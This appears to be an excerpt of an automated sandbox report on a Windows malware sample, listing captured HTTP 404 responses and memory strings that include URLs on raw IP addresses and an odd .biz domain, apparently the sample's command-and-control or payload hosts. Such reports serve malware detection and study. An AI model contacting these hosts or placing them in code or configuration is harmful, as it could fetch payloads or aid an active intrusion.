Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:14:57 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:01 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:12 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 26 Nov 2024 07:15:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 26 Nov 2024 07:15:43 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 26 Nov 2024 07:15:47 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 26 Nov 2024 07:15:48 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.143/kgrfegimyutt~
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.222.143/mbuec
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.00000000053C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://172.234.2I
Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/
Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/1
Source: alg.exe, 00000011.00000003.1712152929.0000000000678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/aatpwqmmnwrfjm
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/nkbiquv
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/nkbiquvf=
Source: Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/nkbiquvo
Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/qmpy
Source: Native_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/qmpyC
Source: alg.exe, 00000011.00000003.1561795732.000000000065D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107:80/eupqxdgegqjrgdpvd
Source: Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107:80/qmpy/
Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/d
Source: Native_neworigin.exe, 0000000D.00000003.1569284648.0000000005392000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/irvq
Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypq
Source: alg.exe, 00000011.00000003.1532040197.000000000065F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1523809233.000000000065E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypq5
Source: alg.exe, 00000011.00000003.1523918107.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177/ulvxycyjutwdmypqN
Source: alg.exe, 00000011.00000003.1589672551.000000000065D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://54.244.188.177:80/sqxdgegqjrgdpvi
Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/a
Source: alg.exe, 00000011.00000003.2641931350.000000000062E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/btnkoeanfymxsstk
Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/d
Source: alg.exe, 00000011.00000003.2633384477.0000000000678000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2410341370.0000000000676000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2177399665.0000000000678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/hrkmkab
Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/pnbkkgdjorsjoiow
Source: alg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197/s
Source: alg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/btnkoeanfymxsstkbat
Source: alg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://82.112.184.197:80/pnckkgdjorsjoiowPA
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://knjghuig.biz/
Source: powershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
